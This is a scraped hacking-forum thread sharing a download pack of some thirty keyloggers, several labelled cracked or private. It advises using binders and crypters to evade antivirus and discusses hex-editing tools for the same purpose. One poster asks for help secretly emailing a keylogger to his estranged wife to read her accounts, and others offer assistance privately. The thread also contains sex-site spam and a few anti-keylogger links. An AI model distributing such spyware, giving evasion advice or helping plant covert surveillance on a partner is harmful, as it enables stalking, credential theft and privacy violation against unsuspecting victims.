rrdtool
Closed Thread
Page 1 of 2 12 LastLast

Thread: collection of keyloggers

collection of keyloggers

here's a collection of keyloggers i found,so im just sharing,and i have not downloaded,or compiled it.

Keyloggers in Pack

-Activity Keylogger v*.0
    -Advanced Invisible Keylogger *.5 Full
    -Aplus
    -Barok *.0
    -Chota
    -Computer Spy
    -Curiosity
    -CYBERSHOK *.0 Private
    -DK2Full
    -ehks 2.2
    -Elite Keylogger *.0
    -EyeSpy
    -Fearless Key Spy 2.0
    -FSK 2.0
    -KeyLog 2.5
    -Keylogger
    -KGB KeySpy 2.0 Private Xmas Edition
    -Metakodix Stealth Keylogger *.*.0 Cracked
    -MSGate 0.*
    -Phantom 2
    -Phoenix
    -Power Spy 5.5.2
    -Project Satan *.*
    -RemoteLogger v*.0
    -SC-KeyLog 2
    -SKL 0.*
    -skl0g
    -Spy
    -Spytector *.*.*
    -Tong KeyLogger
    -YSK KeyLog

[url]http://rs2*5.rapidshare.com/files/85872558/Keyloggers.rar[/url]

Obviously you will need file binders and crypters,so google them.
    Nozf*r4tu
    jabber: gh05t*d@jabb*r.org Email: gh05t*d@hack.cl

Internet security is as real as your Dreams !

Stickied; anyone else can feel free to add their own. Please note that since these are keyloggers, they will show up on the AV scanners most likely. Also due to the nature of the files involved, I doubt the mods and admins will be able to pick apart which are real keyloggers meant for you to use and which are malicious trojans meant to infect you.
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx

i've noticed that most downloadable netbus and sub7 programs on the web are just trojans and viruses not real programs and they do not work.
    i will post here if i found a link for a real keylogger not just a virus

Quote Originally Posted by Gotharious View Post
    i've noticed that most downloadable netbus and sub7 programs on the web are just trojans and viruses not real programs and they do not work.
    i will post here if i found a link for a real keylogger not just a virus
    Come on, read Moonbats post again. Virus scanners will find all public tools like that as viruses.

hey mate, that's when it's a file or 2, not the whole files are back door trojans, right?

The more popular they are, like netbus or subseven, the more strings will be detected. Thats a good reason, if you are hex editing, to go to a less popular program

then tell me Mate, what do you think about Net Tools v5?

A little help please

Hey there,

I have looked at keyloggers and bought a few and am very stuck. I am getting divorced and I don't even know why. I have no idea about how much ***** my wife has in her account and who she is emailing etc.

All I want to do is get a keystroke logger and send it to her new computer and have it report back to me.

I have realized that I cannot do this myself.

Is there anyone out there that can do this for me if I pay for the keylogger and pay them a little something to set it up. I just want to make sure that she will open the damn thing when it arrives in her email and I will get the info.

Please advise

Ben

look in your private message box........

I would like to help,email me or contact me at
    my private box and give me your email ok.

Thank you for programmes but possible explanation is simple it

Quote Originally Posted by Moonbat View Post
    Stickied; anyone else can feel free to add their own. Please note that since these are keyloggers, they will show up on the AV scanners most likely. Also due to the nature of the files involved, I doubt the mods and admins will be able to pick apart which are real keyloggers meant for you to use and which are malicious trojans meant to infect you.
    Yeah we got to watch out for viruses and scannes
    A smart teen with no knowledge

Quote Originally Posted by tonilovekelly View Post
    but the tension and hunger in her vagina were making her contemplate doing things she never would had done in the past. All at once an inside office door opened up [url=http://www.love-sex-videos.com]sex videos[/url] and a woman nodded and motioned her to come inside. After they both got comfortable the woman behind the desk asked, "Do you know what we do here at Pleasure Inc.?"
    Wow the spam is actually getting good on this site! Keep it coming bots!
    7h* L**7*57 c4n7 h4ck m*!
    Proud to have quit playing ȧ

If you write like a semi-literate boob you will very likely be ignored.
    Writing like a l**t script kiddie hax0r is the absolute l**t*st way to write!
    L0L

Some keyloggers are outdated, but nice collection.

thanks for giving such a collection of keyloggers.. I searched for some keyloggers and get them all here.. I want a trojan remover.. Where to get it.. Is that available as freeware? Please give the details..
    =====
    james
    [URL="http://www.widecircles.com"]Social Media Marketing - *8**5*847.047664[/URL]
    Last edited by jamesp; 07-03-2008 at 02:26 PM.

Quote Originally Posted by jamesp View Post
    thanks for giving such a collection of keyloggers.. I searched for some keyloggers and get them all here.. I want a trojan remover.. Where to get it.. Is that available as freeware? Please give the details..
    If you're looking specifically for trojan removers that are aimed at keyloggers, here are two products that can help:

[url]http://www.all-nettools.com/keylogger-antikeylogger-*2/anti-keylogger-*5*24.htm[/url]
    [url]http://www.all-nettools.com/keylogger-antikeylogger-*2/advanced-anti-keylogger-68.htm[/url]

If you're looking for a general purpose anti-spyware program, try something like AdAware by Lavasoft. It's good.

Closed Thread